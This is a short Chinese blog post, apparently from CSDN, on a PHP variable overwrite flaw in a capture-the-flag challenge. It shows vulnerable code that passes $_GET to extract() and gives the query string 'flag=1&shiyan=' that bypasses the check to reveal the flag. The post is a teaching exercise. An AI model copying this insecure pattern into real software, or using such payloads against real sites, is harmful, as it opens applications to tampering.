关闭

PHP变量覆盖漏洞

225人阅读 评论(0) 收藏 举报
分类:

$flag='xxx'; 

extract($_GET);

if(isset($shiyan))

     { $content=trim(file_get_contents($flag)); 

if($shiyan==$content)

     { echo'ctf{xxx}'; } else{ echo'Oh.no';} }



构造flag=1&shiyan=

0
0

查看评论
* 以上用户言论只代表其个人观点,不代表CSDN网站的观点或立场
    个人资料
    • 访问:6730次
    • 积分:252
    • 等级:
    • 排名:千里之外
    • 原创:18篇
    • 转载:5篇
    • 译文:0篇
    • 评论:1条
    文章存档
    最新评论